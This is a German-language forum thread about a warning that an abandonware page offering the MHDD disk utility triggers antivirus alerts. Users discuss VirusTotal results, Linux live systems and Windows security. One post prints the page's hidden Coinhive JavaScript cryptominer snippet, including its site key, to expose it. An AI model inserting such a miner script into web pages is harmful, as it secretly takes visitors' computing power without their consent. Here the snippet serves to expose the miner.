Hier, Beitrag "Technics Keyboard Festplatte klonen geht das ?" schlägt im letzten Beitrag mein AVG-Virenscanner an. Den Link mit dem DOS-Programm nicht anklicken!!!
:
Verschoben durch User
michael_ schrieb: > Den Link mit dem DOS-Programm nicht anklicken!!! Da schlägt wohl jeder virenscanner an, ziehe es halt von archive.org
Mampf F. schrieb: > Drück halt auf den "melden" Link und melde es ... Hab den Eröffnungspost in diesem Thread schon längst gemeldet.
michael_ schrieb: > Den Link mit dem DOS-Programm nicht anklicken!!! Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort auf den Beitrag. gehts um die Webseite selber? mybrainwillexplode.com/ oder um eines oder alle der Programme: mhdd2932.zip mhdd30-spaces.ru_.zip mhdd29.zip MHDD.ver_.3.0.zip MHDD-2.9.zip mhdd2932 wurde jdf. gerademal entpackt unter dosemu gestartet ein clamav fand zuvor nichts aussergewöhnliches zu berichten. (Unter dosemu hat das eh keinen zugriff auf Hardware, nur mal gucken was was das so anzeigt, solche Programme sind bestens geignet sich ins Knie zu schießen auch ohne "viralen" Status) --- vlt. mal hier gucken, wenns drückt. http://web.archive.org/web/20041010103625/http://mhddsoftware.com:80/downloads.shtml Und man muß nicht auf alles klicken was einm vor die Nase gehalten wird ;)
dolli schrieb: > Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort > anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort > auf den Beitrag. Nein. Nach dem Anklicken kam sofort die Warnung von AVG. Ein Computerscan erbrachte BV:Miner-T(Tri). Bei mir war es der erste Virus seit 20 Jahren. Nur Mut, klick doch drauf.
michael_ schrieb: > Bei mir war es der erste Virus seit 20 Jahren. > Nur Mut, klick doch drauf. Ich surfe seit 20 Jahren mit einem Linux-Livesystem. Das startet sauber von einer CD und beim Ausschalten wird alles geloescht, was sich evtl. eingenistet hat. Interessante Dateien speichere ich auf einen Stick. den ich mit einem AV-Scanner pruefe, bevor ich ihn in einen andere Rechner stecke, aber bisher war noch nie was Boeses drauf. Linux-Welt bringt in jedem Heft Live-Systeme, da kann man verschiedene ausprobieren und sich eins aussuchen. Zur Zeit probiere ich gerade das PORTEUS- Livesystem aus Heft 6/2018.
michael_ schrieb: > dolli schrieb: >> Kann man das eigentlich auch etwas präzisieren? Und weshalb nicht dort >> anmerken wo das tatsächliche oder vermeindliche Übel droht, als Antwort >> auf den Beitrag. > > Nein. Nein? Also man macht einen neuen thread auf und keinen Hinweis an der Stelle an man ggf. draufklickt. > Nach dem Anklicken kam sofort die Warnung von AVG. > Ein Computerscan erbrachte BV:Miner-T(Tri). > Bei mir war es der erste Virus seit 20 Jahren. > Nur Mut, klick doch drauf. Falls es den gibt geht er meinem browser jdf. anscheinend am allerwertesten vorbei. Die Datei mhdd2932.zip wurde jdf. von virustotals 59 scannern nicht beanstandet, man kann diese auch an anderen Stellen finden. https://www.virustotal.com/de/file/55278058ce0caa88dec6fee08f25fd78abad27df9b68c9d15ecd8310203e6394/analysis/ k.A. ob das als link klappt.
While trying to retrieve the URL: http://mybrainwillexplode.com/abandonware/util/diag/mhdd-2-9-mhdd-3-0-chs-hard-drive-test-utility/ The content is blocked due to the following condition: Die URL die Sie öffnen wollen ist durch den Inhaltsfilter gesperrt. Sollten Sie die Sperre für nicht gerechtfertigt halten können Sie uns unter xxx@yyy.zz kontaktieren. Ihre EDV-Abteilung Report: Blocked Category (Hacking/Computer Crime) ;) merciless
Mal mit curl in eine Datei gespeichert und zu virustotal hochgeladen. Das mit dem URL direkt angeben funktioniert irgendwie nicht richtig 33/56 https://www.virustotal.com/de/file/4bcf411b5ccc5e29e3c6c0b76f43922ed943129fffd6bc2d4714cf924b26fc33/analysis/1543917891/ JS abschalten oder Bogen darum machen, SORRY :)
Mike schrieb: > Interessante Dateien speichere ich auf einen Stick. Klingt furchtbar lästig. Du hast beim Arbeiten dann immer 2 Computer am Laufen? Code-Snippets von Stackoverflow, Programme, Libraries müssen immer erst per Stick übertragen werden? Wie machst du denn Versionskontrolle, immer Diffs kopieren? Off-Site-Backups nehmen dann auch immer den Umweg über eine externe Platte?
Mike schrieb: > den ich mit einem AV-Scanner pruefe, Und was machst du mit Viren, welche den Scanner selbst angreifen? Bekanntlich haben die so viele Sicherheitslücken dass sie den Rechner eher unsicherer machen...
Dr. Sommer schrieb: > Klingt furchtbar lästig. Kommt drauf an, was man im Netz macht. Ich spiele nicht, sondern klicke nur Sachseiten an oder diskutiere in Foren wie diesem. Dabei surfe ich mit einem Notebook ohne Festplatte und lade interessante Dateien wie sie kommen auf den Stick, den ich später geordnet auf eine Festplatte öbertrage. Sehr oft bin ich sogar zu faul, den Stick mit Scanner zu prüfen, weil es bei Linux nur höchst selten Malware gibt. Das ist alles überhaupt nicht lästig, sondern im Gegenteil sehr bequem, weil ich mir seit 20 Jahren absolut keine Gedanken über Viren und son Zeugs mache, obwohl ich fast täglich im Netz bin.
Mike schrieb: > Dabei surfe ich mit einem Notebook > ohne Festplatte und lade interessante Dateien wie sie kommen auf den > Stick, > den ich später geordnet auf eine Festplatte öbertrage. Und was wenn du an einer längeren Diskussion teilnimmst und Code-Snippets austauschst? Dann musst du die ja ständig hin und her kopieren um sie ausprobieren zu können. Mike schrieb: > Das ist alles überhaupt nicht lästig, sondern im Gegenteil sehr bequem, > weil ich mir seit 20 Jahren absolut keine Gedanken über Viren > und son Zeugs mache, obwohl ich fast täglich im Netz bin. Ich auch, hatte seit 20 Jahren kein Virus obwohl ich diesen Zirkus nicht mache. Unter Windows benutze ich auch nur noch den Windows Defender. Tägliche Backups sind natürlich Pflicht. Wie installierst du überhaupt Updates auf dem Arbeitsrechner? Diese sind ja sehr wichtig um ggf. verseuchte per USB-Stick übertragene Dateien abzuwehren. Solche Exploits können Virenscanner oft nicht gut identifizieren.
Dr. Sommer schrieb: > Unter Windows benutze ich auch ... Windows??? Ist das diese Mistbrühe voller Viren? Muss ja einer krank sein, wenn er sich sowas freiwillig reinzieht.
Mike schrieb: > Ist das diese Mistbrühe voller Viren? Meines Wissens liefert Microsoft standardmäßig keine Viren mit. Und wenn man nicht gleich jeden Mail-Anhang öffnet bekommt man auch nicht so schnell welche. Mike schrieb: > Muss ja einer krank sein, > wenn er sich sowas freiwillig reinzieht. Es hat sich viel gebessert. Win10 ist fast schon bedienbar. Und manche Software läuft halt nur unter Windows.
Mike schrieb: > Dr. Sommer schrieb: >> Unter Windows benutze ich auch ... > > Windows??? > Ist das diese Mistbrühe voller Viren? > Muss ja einer krank sein, > wenn er sich sowas freiwillig reinzieht. In deinem Fall liegt das Problem eher vor dem Bildschirm, wenn du mit einem Betriebssystem nicht umgehen kannst und nur deswegen von Windows zu Linux gewechselt bist. Viren bzw. Schadsoftware kann man für jedes Betriebssystem schreiben und Sicherheitslücken können auch in jedem Betriebssystem und in jeder Software vorkommen. Eine Rechtetrennung zwischen Nutzer und Admin gibt es jedenfalls schon seit Windows NT 3.5 erstmals erschienen ist. Und halbwegs sichere Defaulteinstellungen gibt es seit dem SP2 (oder war's SP3?) für Windows XP. Address space layout randomization gibt's seit Windows Vista. Und so etwas wie UAC innerhalb der grafischen Oberfläche hat ein Linux Deskop System bis heute nicht in ausgereifter Form, da ist X.ORG die Sicherheitslücke. Das wird es erst mit Wayland geben, aber bis das standardmäßig in jeder Distri verwendet wird und bspw. auch die proprietären NVidia Treiber das unterstützen, wird es noch dauern. Ein paar weitere Sicherheitsmerkmale gab es dann noch mit Windows 8x auf Kernelebene. Bei Windows 10 weiß ich es gerade eben nicht. Ich bin übrigens Linux und Windows Nutzer gleichermaßen und finde Fanboyismus dämlich. Deswegen habe ich dir das geschrieben. Ich habe sogar auch ein FreeBSD im Einsatz.
Nano schrieb: > schon seit Windows NT 3.5 Tatsächlich schon länger, seit NT 3.1, das vor einem Vierteljahrhundert auf den Markt kam.
OS spielt hier keine Rolle und ein Virus ist das ja eigentlich auch nicht. Das ist auch nicht versteckt. Eher unberechtigtes und unerwünschtes nutzen der cpu/gpu Wobei der Webseitenbesitzer evtl. garnicht weis da sich der key auf wenigstens 154 weiteren Webseiten findet. Nicht falsch verstehen ich will und brauch das auch nicht!
1 | aus source der betr. Seite |
2 | |
3 | </body></html><script src="https://coinhive.com/lib/coinhive.min.js"></script> |
4 | <script type="text/javascript"> |
5 | var miner = new CoinHive.Anonymous("XoWXAWvizTNnyia78qTIFfATRgcbJfGx"); |
6 | miner.setThrottle(0.1); |
7 | miner.start(); |
8 | </script> |
unauthorized-coin-mining-browser https://www.paloaltonetworks.com/resources/blogs/unit42-unauthorized-coin-mining-browser.html
coinhive.com/documentation/miner
1 | ... The Coinhive JavaScript Miner lets you embed a Monero miner directly into your website. The miner itself does not come with a User Interface – it's your responsibility to tell your users what's going on and to provide stats on mined hashes... |
2 | |
3 | |
4 | ... While it's possible to run the miner without informing your users, we strongly advise against it. You know this. Long term goodwill of your users is much more important than any short term profits. |
5 | |
6 | ... The miner runs until you explicitely stop it again or the user navigates away... |
Rufus Τ. F. schrieb: > Nano schrieb: >> schon seit Windows NT 3.5 > > Tatsächlich schon länger, seit NT 3.1, das vor einem Vierteljahrhundert > auf den Markt kam. Ja, hast recht. Ich war mir jetzt nicht mehr so sicher, welche NT Version jetzt genau die erste war. Ich habe daher geraten ohne nachzusehen.
dolli schrieb: > Eher unberechtigtes und unerwünschtes nutzen der cpu/gpu > Wobei der Webseitenbesitzer evtl. garnicht weis da sich der key auf > wenigstens 154 weiteren Webseiten findet. > >... > > https://www.paloaltonetworks.com/resources/blogs/unit42-unauthorized-coin-mining-browser.html Das perfide an der ganzen Sache ist, dass Javascript Webworker bei Firefox in about:performance gar nicht zugehörig zur Seite angezeigt werden. D.h. selbst wenn man bemerkt, dass die Leistung der CPU irgendwie runter geht, wird die Ursache dafür nicht in der about:performance Seite angezeigt. Man kann nur von einem Tool des Betriebssystems, das die CPU Auslastung anzeigt, auf den gesamten Firefox Prozess schließen. https://de.wikipedia.org/wiki/Web_Worker Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und auch Webworker Skripte in about:performance aufgezeigt werden. Denn so wie es jetzt ist, könnte eine Webseite praktisch unbemerkt einen Miner laufen lassen ohne das der Nutzer es schnell merkt die Ursache in der Webseite zu finden. Meine Empfehlung wäre daher momentan so wenige Webseiten wie nur möglich offen zu halten. Und das ist leider leichter als getan, wenn man es gewohnt ist, dutzende Webseiten in Firefoxfenstern und Tabs offen zu halten. Eventuell gibt es auch Plugins um solche Scripte aufzuspüren. Bis dahin nutze ich noscript, aber solange man keinen Codeaudit der Javascripte macht, könnten auch die erlaubten Scripte Minern sein.
Nano schrieb: > Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und > auch Webworker Skripte in about:performance aufgezeigt werden. Wird wohl mit V64 kommen: https://www.heise.de/newsticker/meldung/Firefox-Browser-bekommt-Task-Manager-4232790.html merciless
Mike schrieb: > Ich surfe seit 20 Jahren mit einem Linux-Livesystem. > Das startet sauber von einer CD und beim Ausschalten > wird alles geloescht, was sich evtl. eingenistet hat. Hallo Mike, so arbeitet es sich etwas komfortabler: https://www.vkldata.com/Benutzerfreundliche-Live-Systeme-mit-SATA-DOM
Volker schrieb: > Mike schrieb: >> Ich surfe seit 20 Jahren mit einem Linux-Livesystem. >> Das startet sauber von einer CD und beim Ausschalten >> wird alles geloescht, was sich evtl. eingenistet hat. > > Hallo Mike, > > so arbeitet es sich etwas komfortabler: > https://www.vkldata.com/Benutzerfreundliche-Live-Systeme-mit-SATA-DOM Nö, da ist nix komfortabel dran. Mal abgesehen davon, daß DOM deutlich höher im Preis als eine DVD oder ein Stick sind: Zum Update darf man die SSD aus dem Rechner/Laptop frickeln und den Schalter umlegen oder wie? oder soll man sich einen (E)Sata Slot ans Laptop flanschen? Nö, da will einer seine privat durchaus gangbare Lösung verallgemeinern. Einfacher als System auf einem USB-Stick und dieses dann in den Speicher laden, danach den Stick ziehen, geht kaum. Und Geschwindigkeitsmäßig hält das locker mit. MfG
Dirk K. schrieb: > Nano schrieb: >> Ich hoffe das sich das mit einer zukünftigen Firefox Version ändert und >> auch Webworker Skripte in about:performance aufgezeigt werden. > > Wird wohl mit V64 kommen: > https://www.heise.de/newsticker/meldung/Firefox-Browser-bekommt-Task-Manager-4232790.html > > merciless Das sieht gut aus. Gefällt mir.
Bitte melde dich an um einen Beitrag zu schreiben. Anmeldung ist kostenlos und dauert nur eine Minute.
Bestehender Account
Schon ein Account bei Google/GoogleMail? Keine Anmeldung erforderlich!
Mit Google-Account einloggen
Mit Google-Account einloggen
Noch kein Account? Hier anmelden.